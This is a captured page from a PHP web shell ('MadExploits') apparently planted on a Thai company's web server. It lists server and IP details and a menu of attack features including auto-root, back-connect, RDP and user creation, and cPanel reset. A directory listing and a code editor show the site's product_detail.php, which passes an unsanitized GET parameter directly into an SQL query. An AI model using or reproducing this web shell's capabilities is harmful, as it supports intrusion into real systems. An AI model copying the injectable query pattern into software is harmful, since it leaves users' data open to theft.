Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.145.106.222
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : product_detail.php
<?PHP include '1Head.php'; include '2HeadMenu.php'; if (isset($_GET['ID'])) { $ID = trim($_GET['ID']); } else { $ID = "0"; } $SQL_Product = " SELECT product.Product_ID, product.ProductCategory_ID, product_category.ProductCategory_Name, product.ProductCategory2_ID, product_category2.ProductCategory2_Name, product.ProductCategory3_ID, product_category3.ProductCategory3_Name, product.StatusProduct_ID, status_product.StatusProduct_Name, product.Member_ID, status_product.StatusProduct_Name, product.Member_ID, member.Member_NameEN, member.Position_ID, position.Position_Name, product.Product_Name, product.Product_Num, product.Product_Unit, product.Product_Price, product.Product_Detail, product.Product_PVScore, product.Product_Img, product.Product_Time, product.Product_Date, product.Product_Visitors, product.Product_Detail2, product.Product_Detail3, product.Product_Color , product.Product_File FROM product_category3 INNER JOIN (product_category2 INNER JOIN (product_category INNER JOIN (status_product INNER JOIN (product INNER JOIN (position INNER JOIN member ON position.Position_ID = member.Position_ID) ON product.Member_ID = member.Member_ID) ON status_product.StatusProduct_ID = product.StatusProduct_ID) ON product_category.ProductCategory_ID = product.ProductCategory_ID) ON product_category2.ProductCategory2_ID = product.ProductCategory2_ID) ON product_category3.ProductCategory3_ID = product.ProductCategory3_ID WHERE product.StatusProduct_ID = 1 AND product.Product_ID = $ID ORDER BY product.ProductCategory_ID "; $objQuery_Product = $objConnect->query($SQL_Product); $Count_Product = mysqli_num_rows($objQuery_Product); $SQL_countries = " SELECT id , countryCode , countryName FROM apps_countries_detailed ORDER BY countryName "; $objQuery_countries = $objConnect->query($SQL_countries); if ($Count_Product == 0) { ?> <meta http-equiv="refresh" content="0.1;URL='product.php'" /><?PHP } else { while ($objResult_Product = mysqli_fetch_array($objQuery_Product)) { $ProductID = $objResult_Product["Product_ID"]; $ProductCategoryName1 = $objResult_Product["ProductCategory_Name"]; $ProductCategoryName2 = $objResult_Product["ProductCategory2_Name"]; $ProductCategoryName3 = $objResult_Product["ProductCategory3_Name"]; $ProductVisitors = $objResult_Product["Product_Visitors"]; $detail_ProductCategory2ID = $objResult_Product["ProductCategory2_ID"]; $detail_ProductCategory3ID = $objResult_Product["ProductCategory3_ID"]; $ProductFile = $objResult_Product["Product_File"]; //echo "ProductFile".$ProductFile; $ProductName = $objResult_Product["Product_Name"]; $ProductPrice = $objResult_Product["Product_Price"]; $ProductDetail3 = $objResult_Product["Product_Detail3"]; $ProductDetail2 = $objResult_Product["Product_Detail2"]; $ProductDetail = $objResult_Product["Product_Detail"]; $ProductImg = $objResult_Product["Product_Img"]; $ProductUnit = $objResult_Product["Product_Unit"]; $ProductDate = $objResult_Product["Product_Date"]; $ProductTime = $objResult_Product["Product_Time"]; $NewformatProductPrice = number_format((float) $ProductPrice, 2, '.', ','); $ProductName = urldecode($ProductName); $ProductDetail = urldecode($ProductDetail); $ProductDetail2 = urldecode($ProductDetail2); $ProductDetail3 = urldecode($ProductDetail3); $strSQL_Visitors = " UPDATE product SET Product_Visitors = Product_Visitors + 1 WHERE Product_ID = '" . $ProductID . "' "; $objConnect->query($strSQL_Visitors); $sql_img_list = " SELECT ProductImg_ID , Product_ID , ProductImg_Name , ProductImg_Date , ProductImg_Time ProductImg_Sort , ProductImg_Status FROM product_img WHERE Product_ID = '$ProductID' "; $objQuery_imglist = $objConnect->query($sql_img_list); $objQuery_imglist2 = $objConnect->query($sql_img_list); function DateThai($strDate) { $strYear = date("Y", strtotime($strDate)) + 543; $strMonth = date("n", strtotime($strDate)); $strDay = date("j", strtotime($strDate)); $strHour = date("H", strtotime($strDate)); $strMinute = date("i", strtotime($strDate)); $strSeconds = date("s", strtotime($strDate)); $strMonthCut = array("", "ม.ค.", "ก.พ.", "มี.ค.", "เม.ย.", "พ.ค.", "มิ.ย.", "ก.ค.", "ส.ค.", "ก.ย.", "ต.ค.", "พ.ย.", "ธ.ค."); $strMonthThai = $strMonthCut[$strMonth]; // return "$strDay $strMonthThai $strYear, $strHour:$strMinute"; return "$strDay $strMonthThai $strYear $strHour:$strMinute"; } $strDate = $ProductDate . $ProductTime; ?> <script src="https://cdn.jsdelivr.net/npm/@splidejs/splide@latest/dist/js/splide.min.js"></script> <link rel="stylesheet" href="assets/css/splide.css"> <link href="admin/css/froala_editor.pkgd.min.css" rel="stylesheet" as="style" type="text/css" /> <style> .product-description table tr:first-child th, .product-description table tr:first-child td { border: none; } div { font-family: auto; } ul { list-style: unset !important; display: block; list-style-type: disc; margin-block-start: 1em; margin-block-end: 1em; margin-inline-start: 0px; margin-inline-end: 0px; padding-inline-start: 40px; } ol, ul { margin-top: 0; margin-bottom: 10px; } li { display: list-item; text-align: -webkit-match-parent; font-family: auto !important; } /* .splide__list { margin: auto !important; } */ </style> <section id="wrapper" style="background: #f9f9f9;"> <?PHP include 'topic-product.php'; ?> <div class="container"> <nav data-depth="5" class="breadcrumb hidden-sm-down"> <ol itemscope itemtype="http://schema.org/BreadcrumbList"> <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"> <a itemprop="item" href="index.php"> <span itemprop="name">Home</span> </a> <meta itemprop="position" content="1"> </li> <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"> <a itemprop="item" href="product.php"> <span itemprop="name">Products</span> </a> <meta itemprop="position" content="2"> </li> <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"> <a itemprop="item" href="product_category.php?c2=<?= $detail_ProductCategory2ID; ?>&N=<?= $ProductCategory2Name; ?>"> <span itemprop="name"><?= $ProductCategoryName2; ?></span> </a> <meta itemprop="position" content="3"> </li> <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"> <a itemprop="item" href="product_category4.php?c3=<?= $detail_ProductCategory3ID; ?>"> <span itemprop="name"><?= $ProductCategoryName3; ?></span> </a> <meta itemprop="position" content="4"> </li> <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"> <a itemprop="item"> <span itemprop="name"><?= $ProductName; ?></span> </a> <meta itemprop="position" content="5"> </li> </ol> </nav> <div class="row bg-index3 p2 mt2 mb2"> <?PHP include 'product_left_cat.php'; ?> <div id="content-wrapper" class="left-column col-xs-12 col-md-9"> <section id="main" itemscope itemtype="https://schema.org/Product"> <meta itemprop="url" content="1231-pila-formatowa-z-podcinakiem-cormak-mj45-kd-3e.html"> <h1 class="h1" itemprop="name"><?= $ProductName; ?></h1> <div class="row"> <div class="col-md-6"> <section class="page-content" id="content"> <ul class="product-flags"> </ul> <div class="images-container"> <div class="images-border-top"></div> <div class="product-cover"> <img class="js-qv-product-cover" src="model/upload/img/IMGProduct/<?= $ProductImg; ?>" alt="<?= $ProductName; ?>" title="<?= $ProductName; ?>" style="width:100%;" itemprop="image"> <div class="layer hidden-sm-down" data-toggle="modal" data-target="#product-modal"> <i class="material-icons zoom-in"></i> </div> </div> <div class="js-qv-mask mask"> <ul class="product-images js-qv-product-images"> <li class="thumb-container"> <img class="thumb js-thumb selected " data-image-medium-src="model/upload/img/IMGProduct/<?= $ProductImg; ?>" data-image-large-src="model/upload/img/IMGProduct/<?= $ProductImg; ?>" src="model/upload/img/IMGProduct/<?= $ProductImg; ?>" alt="<?= $ProductName; ?>" title="<?= $ProductName; ?>" width="100" itemprop="image"> </li> <?PHP $CHK_imglist = mysqli_num_rows($objQuery_imglist); while ($objResult_imglist = mysqli_fetch_array($objQuery_imglist)) { $imglist_ProductImg_ID = $objResult_imglist["ProductImg_ID"]; $imglist_ProductImg_Name = $objResult_imglist["ProductImg_Name"]; ?> <li class="thumb-container"> <img class="thumb js-thumb" data-image-medium-src="model/upload/img/IMGProduct/<?= $imglist_ProductImg_Name; ?>" data-image-large-src="model/upload/img/IMGProduct/<?= $imglist_ProductImg_Name; ?>" src="model/upload/img/IMGProduct/<?= $imglist_ProductImg_Name; ?>" alt="<?= $ProductName; ?>" title="<?= $ProductName; ?>" width="100" itemprop="image"> </li> <?PHP } ?> </ul> </div> <div class="images-border-bottom"></div> </div> <div class="scroll-box-arrows"> <i class="material-icons left"></i> <i class="material-icons right"></i> </div> </section> </div> <div class="col-md-6"> <div class="product-information"> <?PHP if ($ProductDetail != "<p>-</p>") { ?> <div id="product-description-short-1231" itemprop="description"> <?= $ProductDetail; ?> </div> <?PHP } ?> <div class="ultimate-consultant-contact-wrapper"> <div class="ultimate-consultant-contact"> <div class="ultimate-consultant-contact-top"> <a href="tel:609939851"> contact us <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="20.493px" height="20.507px" viewBox="5.782 2.577 20.493 20.507" enable-background="new 5.782 2.577 20.493 20.507" xml:space="preserve"> <g> <path d="M6.429,8.917c-1.922-4.458,1-5.688,1.538-6.073C8.504,2.46,9.658,2.306,10.888,3.69c1.153,1.384,3.69,3.998,2.229,5.305 c-1.538,1.384-1.691,2.229-0.922,3.306c0.461,0.692,3.613,3.844,4.305,4.305c1.153,0.769,1.999,0.691,3.305-0.846 c1.308-1.538,3.922,1,5.305,2.229c1.385,1.229,1.308,2.306,0.923,2.845c-0.384,0.537-1.614,3.536-6.073,1.614 C15.193,20.373,8.428,13.684,6.429,8.917z M15.347,4.536c-1.153,0-1.076-1.691,0-1.614c5.843-0.077,10.608,4.689,10.608,10.532 c0,1.153-1.691,1.153-1.691,0.077C24.264,8.533,20.267,4.536,15.347,4.536z M16.807,8.457c-1.076,0-1.076-1.691,0-1.691 c2.846,0,5.229,2.383,5.229,5.228c0,1.153-1.691,1.153-1.691,0C20.344,10.071,18.729,8.457,16.807,8.457z" /> </g> </svg> </a> </div> <div class="ultimate-consultant-contact-bottom"> <p class="email"> <a href="mailto:sales@sniperthailand.com">sales@sniperthailand.com</a> </p> </div> </div> </div> <div class="product-prices"> <div class="product-price h5 " itemprop="offers" itemscope itemtype="https://schema.org/Offer"> <link itemprop="availability" href="https://schema.org/InStock" /> <meta itemprop="priceCurrency" content="PLN"> <div class="current-price" style="display: none;"> </div> </div> <?PHP if ($ProductPrice != 0) { ?> <div class="row"> <div class="col-md-12"> <div class="tax-shipping-delivery-label"> PRICE </div> <div> <span itemprop="price" content="22900"> <?= $ProductPrice; ?></span> </div> </div> </div> <?PHP } ?> <center> <a href="https://wa.me/66836022251" class="btn btn-primary width60 mt2 bg-index1"><img src="img/whatsapp.png" style="width: 20px;"> What's app</a> </center> <center> <a href="contact.php" class="btn btn-primary width60 mt2"><img src="img/contact.png" style="width: 20px;"> CONTACT </a></center> <center> <a href="mailto:sales@sniperthailand.com" class="btn btn-primary width60 mt2 bg-index2"><img src="img/request.png" style="width: 20px;"> REQUEST QUOTE </a></center> <?PHP if (isset($_SESSION['ses_ContactID'])) { // echo "Yes"; $sesContactID = $_SESSION['ses_ContactID']; } else { //echo "No"; $CHKContactID = "0"; } if ($CHKContactID == 1) { if ($ProductFile != null) { ?> <center><a href="model/upload/file/<?= $ProductFile; ?>" class="btn btn-primary width60 mt2 bg-index2" download><img src="img/file.png" style="width: 20px;"> <?= $text10; ?></a></center> <?PHP } else { } } else { ?> <center><a href="#" class="btn btn-primary width60 mt2 bg-index2" data-toggle="modal" data-target="#exampleModal"><img src="img/file.png" style="width: 20px;"> <?= $text10; ?> </a></center> <?PHP } ?> <!-- Modal --> <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog"> <form name="personnel " method="POST" action="model/controller/contact_front_end_Add.php"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel"> <?= $text9; ?> </h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <input type="text" name="Product" value="<?= $ProductID; ?>" hidden="hidden" /> <input type="text" name="Form" value="AddImgsubcategory" hidden="hidden" /> <input type="text" name="Teb" value="Add" hidden="hidden" /> <input type="text" name="subject" value="Download Document" hidden="hidden" /> <input type="text" name="message" value="Download Document" hidden="hidden" /> <div class="form-group"> <label for="Name"><?= $text1; ?>*</label> <input type="text" id="Name" name="fname" class="form-control" required> </div> <div class="form-group"> <label for="Position"><?= $text2; ?>*</label> <input type="text" id="Position" name="Position" class="form-control" required> </div> <div class="form-group"> <label for="CompanyName"><?= $text3; ?>*</label> <input type="text" id="CompanyName" name="CompanyName" class="form-control" required> </div> <div class="form-group"> <label for="BusinessType"><?= $text4; ?>*</label> <input type="text" id="BusinessType" name="BusinessType" class="form-control" required> </div> <div class="form-group"> <label for="CompanyAddress"><?= $text5; ?>*</label> <input type="text" id="CompanyAddress" name="Address" class="form-control" required> </div> <div class="form-group"> <label for="CompanyAddress"><?= $text20 ; ?>*</label> <select class="form-control" name="country" required> <option value="0">Country</option> <?PHP while ($objResult_countries = mysqli_fetch_array($objQuery_countries)) { ?> <option value="<?= $objResult_countries["countryName"]; ?>"> <?= $objResult_countries["countryName"]; ?></option> <?PHP } ?> </select> </div> <div class="form-group"> <label for="Telephone"><?= $text11; ?>*</label> <input type="text" id="Telephone" name="Tel" class="form-control" required> </div> <div class="form-group"> <label for="Email"><?= $text6; ?>*</label> <input type="email" id="Email" name="Email" class="form-control" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal"><?= $text7; ?></button> <button type="submit" class="btn btn-primary"><?= $text8; ?></button> </div> </div> </form> </div> </div> <!-- a href="../model/upload/file/<?= $ProductFile; ?>" download><?= $ProductFile; ?></a> --> </div> </div> </div> </div> <?PHP } ?> <div class="modal fade js-product-images-modal" id="product-modal"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-body bg-index3 modal-body-index1"> <div class="splide " id="splide"> <div class="splide__track"> <ul class="splide__list div-center-important"> <li class="splide__slide" id="example-fade-slide<?= $ProductID; ?>" aria-hidden="false"> <img class="js-qv-product-cover " src="model/upload/img/IMGProduct/<?= $ProductImg; ?>" itemprop="image" alt="><?= $ProductName; ?>" title="><?= $ProductName; ?>"> </li> <?PHP while ($objResult_imglist2 = mysqli_fetch_array($objQuery_imglist2)) { $imglist_ProductImg_ID2 = $objResult_imglist2["ProductImg_ID"]; $imglist_ProductImg_Name2 = $objResult_imglist2["ProductImg_Name"]; ?> <li class="splide__slide" id="example-fade-slide<?= $imglist_ProductImg_ID2; ?>"> <img class="js-qv-product-coverimg-index4 " src="model/upload/img/IMGProduct/<?= $imglist_ProductImg_Name2; ?>" itemprop="image" alt="><?= $ProductName; ?>" title="><?= $ProductName; ?>"> </li> <?PHP } ?> </ul> </div> </div> <script> new Splide('#splide', { type: 'fade', rewind: true, }).mount(); </script> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> </section> </div> </div> <?PHP if ($ProductDetail2 == "<p>-</p>") { $ProductDetail2 = ""; } else { ?> <div class="row bg-index3 p2 mt2 mb2"> <div class="col-md-12"> <hr> <div class="tabs"> <div class="tab-content" id="tab-content"> <div class="product-description"> <?= $ProductDetail2; ?> <hr> </div> </div> </div> </div> </div> <?PHP } ?> </div> <!-- <div class="container"> <?PHP //include 'product_contact.php'; ?> </div> --> </section> <?PHP } include 'product_detail_More_products.php'; include '3Footer.php'; include '4End.php'; ?>
Close